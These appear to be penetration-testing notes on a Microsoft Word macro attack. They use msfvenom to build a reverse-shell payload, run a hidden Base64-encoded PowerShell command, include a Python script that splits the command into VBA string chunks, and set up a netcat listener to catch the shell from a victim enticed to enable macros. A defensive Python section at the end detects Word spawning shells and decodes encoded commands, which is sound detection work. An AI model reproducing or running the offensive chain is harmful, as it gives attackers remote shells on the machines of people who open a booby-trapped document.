MSOffice macro attack
Kind of an outdated technique; better options are available using Metasploit / Cobalt Strike.
Using macros for attacks: open Word → View → Macros

Create a new macro



We must save the containing document as either .docm or the older .doc format, which supports embedded macros, but must avoid the .docx format, which does not support them.

Save on Desktop

Click on EvilMacro and enable content to trigger the script

Macro triggers cmd.exe

#Using PowerShell and a Base64-encoded payload to get a reverse shell
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

Edit the EvilMacro

Since VBA has a limit on the length of strings, we have to split the command into chunks before running the exploit.
#Python3 script
# Print the command as VBA "Str = Str + ..." lines of n characters each
cmd = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(cmd), n):
    print("Str = Str + " + '"' + cmd[i:i+n] + '"')


#Insert the macro


Start a nc listener on port 4444
nc -nvlp 4444
You have to save the document in the Word 1997-2003 format, as later versions are not vulnerable
Open the file and enable macros
In an engagement scenario, the victim has to be enticed to click on it and enable macros (unlikely)

Catch the revshell
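
From the defender's side, the chain above leaves a clear trace: Word as the parent process of cmd.exe or powershell.exe. The following is an added example, not part of the original notes; it triages process-creation records for that lineage and decodes any -e argument for review. The field names follow Sysmon Event ID 1; the sample events, paths and helper names are constructed assumptions.

```python
import base64
import ntpath
import re

OFFICE_PARENTS = {"winword.exe"}                # extend for other Office apps
SHELL_CHILDREN = {"cmd.exe", "powershell.exe"}  # children named on this page
FLAG_RE = re.compile(r"\s-(e\w*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

def decode_encoded_command(command_line):
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text)."""
    for flag, blob in FLAG_RE.findall(command_line):
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...)
        if flag.lower() == "ec" or "encodedcommand".startswith(flag.lower()):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # truncated or non-Base64 blob
                return None
    return None

def triage(events):
    """Return findings for events where Word is the parent of a shell."""
    findings = []
    for ev in events:
        parent = ntpath.basename(ev["ParentImage"]).lower()
        child = ntpath.basename(ev["Image"]).lower()
        if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
            findings.append({"child": child,
                             "hidden": bool(re.search(r"\s-w\w*\s+hidden", ev["CommandLine"], re.I)),
                             "decoded": decode_encoded_command(ev["CommandLine"])})
    return findings

WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def sample_events():
    """Constructed process-creation records (field names as in Sysmon Event ID 1)."""
    blob = base64.b64encode("Write-Output 'constructed'".encode("utf-16-le")).decode()
    return [
        {"ParentImage": r"C:\Windows\explorer.exe", "Image": WORD,
         "CommandLine": "WINWORD.EXE /n report.doc"},
        {"ParentImage": WORD, "Image": r"C:\Windows\System32\cmd.exe",
         "CommandLine": "cmd.exe"},
        {"ParentImage": WORD, "Image": PS,
         "CommandLine": "powershell.exe -nop -w hidden -e " + blob},
    ]

if __name__ == "__main__":
    for finding in triage(sample_events()):
        print(finding)
```

Word launched by explorer.exe is not flagged; only the two events where Word itself is the parent are reported.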
